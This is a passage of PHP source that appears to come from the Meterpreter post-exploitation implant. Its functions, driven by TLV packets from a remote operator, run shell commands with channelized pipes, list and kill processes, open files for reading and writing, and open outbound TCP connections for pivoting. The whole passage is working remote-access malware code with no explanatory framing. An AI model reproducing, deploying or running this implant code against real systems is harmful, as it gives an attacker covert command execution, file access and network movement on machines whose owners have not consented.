# strlen($cmd)) { return ERROR_FAILURE; } #my_print("Flags: $flags (" . ($flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) .")"); if ($flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) { global $processes, $channels; my_print("Channelized"); $handle = proc_open($real_cmd, array(array('pipe','r'), array('pipe','w'), array('pipe','w')), $pipes); if ($handle === false) { return ERROR_FAILURE; } $pipes['type'] = 'stream'; register_stream($pipes[0]); register_stream($pipes[1]); register_stream($pipes[2]); $channels[] = $pipes; # associate the process with this channel so we know when to close it. $processes[count($channels) - 1] = $handle; packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, 0)); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PROCESS_HANDLE, count($processes)-1)); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, count($channels)-1)); } else { # Don't care about stdin/stdout, just run the command my_cmd($real_cmd); } return ERROR_SUCCESS; } } # Works, but not very portable. There doesn't appear to be a PHP way of # getting a list of processes, so we just shell out to ps/tasklist.exe. I need # to decide what options to send to ps for portability and for information # usefulness. if (!function_exists('stdapi_sys_process_get_processes')) { function stdapi_sys_process_get_processes($req, &$pkt) { my_print("doing get_processes"); $list = array(); if (is_windows()) { # This command produces a line like: # "tasklist.exe","2264","Console","0","4,556 K","Running","EGYPT-B3E55BF3C\Administrator","0:00:00","OleMainThreadWndName" $output = my_cmd("tasklist /v /fo csv /nh"); $lines = explode("\n", trim($output)); foreach ($lines as $line) { $line = trim($line); # # Ghetto CSV parsing # $pieces = preg_split('/","/', $line); # Strip off the initial quote on the first and last elements $pieces[0] = substr($pieces[0], 1, strlen($pieces[0])); $cnt = count($pieces) - 1; $pieces[$cnt] = substr($pieces[$cnt], 1, strlen($pieces[$cnt])); $proc_info = array($pieces[1], $pieces[6], $pieces[0]); array_push($list, $proc_info); } } else { # This command produces a line like: # 1553 root /sbin/getty -8 38400 tty1 $output = my_cmd("ps a -w -o pid,user,cmd --no-header 2>/dev/null"); $lines = explode("\n", trim($output)); foreach ($lines as $line) { array_push($list, preg_split("/\s+/", trim($line))); } } foreach ($list as $proc) { $grp = ""; $grp .= tlv_pack(create_tlv(TLV_TYPE_PID, $proc[0])); $grp .= tlv_pack(create_tlv(TLV_TYPE_USER_NAME, $proc[1])); $grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_NAME, $proc[2])); # Strip the pid and the user name off the front; the rest will be the # full command line array_shift($proc); array_shift($proc); $grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_PATH, join($proc, " "))); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PROCESS_GROUP, $grp)); } return ERROR_SUCCESS; } } # works if (!function_exists('stdapi_sys_process_getpid')) { function stdapi_sys_process_getpid($req, &$pkt) { my_print("doing getpid"); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid())); return ERROR_SUCCESS; } } if (!function_exists('stdapi_sys_process_kill')) { function stdapi_sys_process_kill($req, &$pkt) { # The existence of posix_kill is unlikely (it's a php compile-time option # that isn't enabled by default, but better to try it and avoid shelling # out when unnecessary. my_print("doing kill"); $pid_tlv = packet_get_tlv($req, TLV_TYPE_PID); $pid = $pid_tlv['value']; if (is_callable('posix_kill')) { $ret = posix_kill($pid, 9); $ret = $ret ? ERROR_SUCCESS : posix_get_last_error(); if ($ret != ERROR_SUCCESS) { my_print(posix_strerror($ret)); } } else { $ret = ERROR_FAILURE; if (is_windows()) { my_cmd("taskkill /f /pid $pid"); # Don't know how to check for success yet, so just assume it worked $ret = ERROR_SUCCESS; } else { if ("foo" == my_cmd("kill -9 $pid && echo foo")) { $ret = ERROR_SUCCESS; } } } return $ret; } } if (!function_exists('stdapi_net_socket_tcp_shutdown')) { function stdapi_net_socket_tcp_shutdown($req, &$pkt) { global $channels; my_print("doing stdapi_net_socket_tcp_shutdown"); $cid_tlv = packet_get_tlv(TLV_TYPE_CHANNEL_ID, $req); $c = get_channel_by_id($cid_tlv['value']); if ($c && $c['type'] == 'socket') { @socket_shutdown($c[0], $how); $ret = ERROR_SUCCESS; } else { $ret = ERROR_FAILURE; } return $ret; } } # END STDAPI ## # Channel Helper Functions ## if (!function_exists('channel_create_stdapi_fs_file')) { function channel_create_stdapi_fs_file($req, &$pkt) { global $channels; $fpath_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $mode_tlv = packet_get_tlv($req, TLV_TYPE_FILE_MODE); #my_print("Opening path {$fpath_tlv['value']} with mode {$mode_tlv['value']}"); if (!$mode_tlv) { $mode_tlv = array('value' => 'rb'); } $fd = @fopen($fpath_tlv['value'], $mode_tlv['value']); if (is_resource($fd)) { register_stream($fd); array_push($channels, array(0 => $fd, 1 => $fd, 'type' => 'stream')); $id = count($channels) - 1; my_print("Created new file channel $fd, with id $id"); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id)); return ERROR_SUCCESS; } else { my_print("Failed to open"); } return ERROR_FAILURE; } } if (!function_exists('channel_create_stdapi_net_tcp_client')) { function channel_create_stdapi_net_tcp_client($req, &$pkt) { global $channels; my_print("creating tcp client"); $peer_host_tlv = packet_get_tlv($req, TLV_TYPE_PEER_HOST); $peer_port_tlv = packet_get_tlv($req, TLV_TYPE_PEER_PORT); $local_host_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_HOST); $local_port_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_PORT); $retries_tlv = packet_get_tlv($req, TLV_TYPE_CONNECT_RETRIES); if ($retries_tlv['value']) { $retries = $retries_tlv['value']; } else { $retries = 1; } for ($i = 0; $i < $retries; $i++) { $sock = connect($peer_host_tlv['value'], $peer_port_tlv['value']); if ($sock) { break; } } if (!$sock) { return ERROR_FAILURE; } # # If we got here, the connection worked, respond with the new channel ID # array_push($channels, array(0 => $sock, 1 => $sock, 'type' => get_rtype($sock))); $id = count($channels) - 1; my_print("Created new channel $sock, with id $id"); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id)); add_reader($sock); return ERROR_SUCCESS; } }